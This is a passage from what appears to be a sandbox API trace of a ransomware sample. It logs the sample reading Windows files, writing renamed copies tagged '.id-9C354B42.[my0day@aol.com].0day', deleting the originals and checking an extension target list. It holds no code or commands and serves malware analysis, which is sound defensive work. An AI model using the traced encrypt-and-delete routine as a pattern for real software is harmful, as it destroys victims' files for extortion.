lstrlenW (lpString="BOOTSTAT.DAT") returned 12 [0033.043] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0033.044] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=65536) returned 1 [0033.044] CloseHandle (hObject=0x170) returned 1 [0033.044] GetFileAttributesW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat")) returned 0x26 [0033.044] GetFileAttributesW (lpFileName="C:\\Boot\\BOOTSTAT.DAT.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\boot\\bootstat.dat.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0033.044] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0033.044] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0033.044] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0033.044] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\boot\\bootstat.dat.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0033.045] GetLastError () returned 0x0 [0033.045] ReadFile (in: hFile=0x170, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x10000, lpOverlapped=0x0) returned 1 [0033.142] WriteFile (in: hFile=0x174, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x10010, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x10010, lpOverlapped=0x0) returned 1 [0033.144] ReadFile (in: hFile=0x170, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0033.144] WriteFile (in: hFile=0x174, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0033.144] SetEndOfFile (hFile=0x174) returned 1 [0033.145] CloseHandle (hObject=0x174) returned 1 [0033.146] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0033.146] SetEndOfFile (hFile=0x170) returned 1 [0033.147] CloseHandle (hObject=0x170) returned 1 [0033.147] SetFileAttributesW (lpFileName="C:\\Boot\\BOOTSTAT.DAT.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x26) returned 1 [0033.147] DeleteFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat")) returned 1 [0033.147] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0033.147] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0033.147] lstrlenW (lpString=".doc") returned 4 [0033.147] lstrcmpiW (lpString1=".doc", lpString2=".DAT") returned 1 [0033.147] lstrlenW (lpString=".docx") returned 5 [0033.147] lstrcmpiW (lpString1=".docx", lpString2="T.DAT") returned -1 [0033.147] lstrlenW (lpString=".pdf") returned 4 [0033.148] lstrcmpiW (lpString1=".pdf", lpString2=".DAT") returned 1 [0033.148] lstrlenW (lpString=".xls") returned 4 [0033.148] lstrcmpiW (lpString1=".xls", lpString2=".DAT") returned 1 [0033.148] lstrlenW (lpString=".xlsx") returned 5 [0033.148] lstrcmpiW (lpString1=".xlsx", lpString2="T.DAT") returned -1 [0033.148] lstrlenW (lpString=".ppt") returned 4 [0033.148] lstrcmpiW (lpString1=".ppt", lpString2=".DAT") returned 1 [0033.148] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0033.148] lstrlenW (lpString=".zip") returned 4 [0033.148] lstrcmpiW (lpString1=".zip", lpString2=".DAT") returned 1 [0033.148] lstrlenW (lpString=".rar") returned 4 [0033.148] lstrcmpiW (lpString1=".rar", lpString2=".DAT") returned 1 [0033.148] lstrlenW (lpString=".bz2") returned 4 [0033.148] lstrcmpiW (lpString1=".bz2", lpString2=".DAT") returned -1 [0033.148] lstrlenW (lpString=".7z") returned 3 [0033.148] lstrcmpiW (lpString1=".7z", lpString2="DAT") returned -1 [0033.148] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0033.148] lstrlenW (lpString=".dbf") returned 4 [0033.148] lstrcmpiW (lpString1=".dbf", lpString2=".DAT") returned 1 [0033.148] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0033.148] lstrlenW (lpString=".1cd") returned 4 [0033.148] lstrcmpiW (lpString1=".1cd", lpString2=".DAT") returned -1 [0033.148] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0033.148] lstrlenW (lpString=".jpg") returned 4 [0033.148] lstrcmpiW (lpString1=".jpg", lpString2=".DAT") returned 1 [0033.149] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0033.149] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0033.149] lstrlenW (lpString=".doc") returned 4 [0033.149] lstrcmpiW (lpString1=".doc", lpString2=".DAT") returned 1 [0033.149] lstrlenW (lpString=".docx") returned 5 [0033.149] lstrcmpiW (lpString1=".docx", lpString2="T.DAT") returned -1 [0033.149] lstrlenW (lpString=".pdf") returned 4 [0033.149] lstrcmpiW (lpString1=".pdf", lpString2=".DAT") returned 1 [0033.149] lstrlenW (lpString=".xls") returned 4 [0033.149] lstrcmpiW (lpString1=".xls", lpString2=".DAT") returned 1 [0033.149] lstrlenW (lpString=".xlsx") returned 5 [0033.149] lstrcmpiW (lpString1=".xlsx", lpString2="T.DAT") returned -1 [0033.149] lstrlenW (lpString=".ppt") returned 4 [0033.149] lstrcmpiW (lpString1=".ppt", lpString2=".DAT") returned 1 [0033.149] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0033.149] lstrlenW (lpString=".zip") returned 4 [0033.149] lstrcmpiW (lpString1=".zip", lpString2=".DAT") returned 1 [0033.149] lstrlenW (lpString=".rar") returned 4 [0033.149] lstrcmpiW (lpString1=".rar", lpString2=".DAT") returned 1 [0033.149] lstrlenW (lpString=".bz2") returned 4 [0033.149] lstrcmpiW (lpString1=".bz2", lpString2=".DAT") returned -1 [0033.149] lstrlenW (lpString=".7z") returned 3 [0033.149] lstrcmpiW (lpString1=".7z", lpString2="DAT") returned -1 [0033.149] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0033.149] lstrlenW (lpString=".dbf") returned 4 [0033.149] lstrcmpiW (lpString1=".dbf", lpString2=".DAT") returned 1 [0033.149] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0033.149] lstrlenW (lpString=".1cd") returned 4 [0033.149] lstrcmpiW (lpString1=".1cd", lpString2=".DAT") returned -1 [0033.149] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0033.149] lstrlenW (lpString=".jpg") returned 4 [0033.149] lstrcmpiW (lpString1=".jpg", lpString2=".DAT") returned 1 [0033.150] Sleep (dwMilliseconds=0x64) [0033.940] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0033.940] lstrlenW (lpString="Setup.xml") returned 9 [0033.940] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.144] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=1608) returned 1 [0034.144] CloseHandle (hObject=0x188) returned 1 [0034.144] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0034.144] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0034.144] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.145] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.145] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.145] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0034.145] GetLastError () returned 0x0 [0034.145] ReadFile (in: hFile=0x188, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x648, lpOverlapped=0x0) returned 1 [0034.146] WriteFile (in: hFile=0x198, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x650, lpOverlapped=0x0) returned 1 [0034.147] ReadFile (in: hFile=0x188, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.148] WriteFile (in: hFile=0x198, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.148] SetEndOfFile (hFile=0x198) returned 1 [0034.148] CloseHandle (hObject=0x198) returned 1 [0034.148] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.148] SetEndOfFile (hFile=0x188) returned 1 [0034.149] CloseHandle (hObject=0x188) returned 1 [0034.149] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0034.149] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0034.150] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.150] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.150] lstrlenW (lpString=".doc") returned 4 [0034.150] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.150] lstrlenW (lpString=".docx") returned 5 [0034.150] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.150] lstrlenW (lpString=".pdf") returned 4 [0034.150] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.150] lstrlenW (lpString=".xls") returned 4 [0034.150] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.150] lstrlenW (lpString=".xlsx") returned 5 [0034.150] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.150] lstrlenW (lpString=".ppt") returned 4 [0034.150] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.150] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.150] lstrlenW (lpString=".zip") returned 4 [0034.150] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.150] lstrlenW (lpString=".rar") returned 4 [0034.150] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.150] lstrlenW (lpString=".bz2") returned 4 [0034.150] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.150] lstrlenW (lpString=".7z") returned 3 [0034.150] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.150] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.150] lstrlenW (lpString=".dbf") returned 4 [0034.150] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.150] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.150] lstrlenW (lpString=".1cd") returned 4 [0034.150] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.150] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.150] lstrlenW (lpString=".jpg") returned 4 [0034.150] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.150] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.151] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.151] lstrlenW (lpString=".doc") returned 4 [0034.151] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.151] lstrlenW (lpString=".docx") returned 5 [0034.151] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.151] lstrlenW (lpString=".pdf") returned 4 [0034.151] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.151] lstrlenW (lpString=".xls") returned 4 [0034.151] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.151] lstrlenW (lpString=".xlsx") returned 5 [0034.151] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.151] lstrlenW (lpString=".ppt") returned 4 [0034.151] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.151] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.151] lstrlenW (lpString=".zip") returned 4 [0034.151] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.151] lstrlenW (lpString=".rar") returned 4 [0034.151] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.151] lstrlenW (lpString=".bz2") returned 4 [0034.151] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.151] lstrlenW (lpString=".7z") returned 3 [0034.151] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.151] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.151] lstrlenW (lpString=".dbf") returned 4 [0034.151] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.151] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.151] lstrlenW (lpString=".1cd") returned 4 [0034.151] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.151] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.151] lstrlenW (lpString=".jpg") returned 4 [0034.151] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.152] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0034.152] lstrlenW (lpString="Proof.xml") returned 9 [0034.152] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.152] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=1347) returned 1 [0034.152] CloseHandle (hObject=0x188) returned 1 [0034.153] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml")) returned 0x2020 [0034.153] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0034.153] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.153] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.153] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.153] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0034.153] GetLastError () returned 0x0 [0034.153] ReadFile (in: hFile=0x188, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x543, lpOverlapped=0x0) returned 1 [0034.155] WriteFile (in: hFile=0x198, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x550, lpOverlapped=0x0) returned 1 [0034.156] ReadFile (in: hFile=0x188, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.156] WriteFile (in: hFile=0x198, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.156] SetEndOfFile (hFile=0x198) returned 1 [0034.156] CloseHandle (hObject=0x198) returned 1 [0034.156] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.156] SetEndOfFile (hFile=0x188) returned 1 [0034.157] CloseHandle (hObject=0x188) returned 1 [0034.157] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0034.157] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml")) returned 1 [0034.158] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0034.158] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0034.158] lstrlenW (lpString=".doc") returned 4 [0034.158] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.158] lstrlenW (lpString=".docx") returned 5 [0034.158] lstrcmpiW (lpString1=".docx", lpString2="f.xml") returned -1 [0034.158] lstrlenW (lpString=".pdf") returned 4 [0034.158] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.158] lstrlenW (lpString=".xls") returned 4 [0034.158] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.158] lstrlenW (lpString=".xlsx") returned 5 [0034.158] lstrcmpiW (lpString1=".xlsx", lpString2="f.xml") returned -1 [0034.158] lstrlenW (lpString=".ppt") returned 4 [0034.158] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.158] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0034.158] lstrlenW (lpString=".zip") returned 4 [0034.158] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.158] lstrlenW (lpString=".rar") returned 4 [0034.158] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.158] lstrlenW (lpString=".bz2") returned 4 [0034.158] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.158] lstrlenW (lpString=".7z") returned 3 [0034.158] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.158] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0034.158] lstrlenW (lpString=".dbf") returned 4 [0034.158] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.158] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0034.158] lstrlenW (lpString=".1cd") returned 4 [0034.158] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.158] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0034.158] lstrlenW (lpString=".jpg") returned 4 [0034.159] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.159] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0034.159] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0034.159] lstrlenW (lpString=".doc") returned 4 [0034.159] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.159] lstrlenW (lpString=".docx") returned 5 [0034.159] lstrcmpiW (lpString1=".docx", lpString2="f.xml") returned -1 [0034.159] lstrlenW (lpString=".pdf") returned 4 [0034.159] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.159] lstrlenW (lpString=".xls") returned 4 [0034.159] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.159] lstrlenW (lpString=".xlsx") returned 5 [0034.159] lstrcmpiW (lpString1=".xlsx", lpString2="f.xml") returned -1 [0034.159] lstrlenW (lpString=".ppt") returned 4 [0034.159] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.159] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0034.159] lstrlenW (lpString=".zip") returned 4 [0034.159] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.159] lstrlenW (lpString=".rar") returned 4 [0034.159] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.159] lstrlenW (lpString=".bz2") returned 4 [0034.159] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.159] lstrlenW (lpString=".7z") returned 3 [0034.159] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.159] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0034.159] lstrlenW (lpString=".dbf") returned 4 [0034.159] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.159] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0034.159] lstrlenW (lpString=".1cd") returned 4 [0034.159] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.159] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0034.159] lstrlenW (lpString=".jpg") returned 4 [0034.159] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.160] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0034.160] lstrlenW (lpString="Proof.xml") returned 9 [0034.160] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.160] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=1457) returned 1 [0034.160] CloseHandle (hObject=0x188) returned 1 [0034.160] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml")) returned 0x2020 [0034.160] GetFileAttributesW (lpFileName="C:\\MSOCache\\All 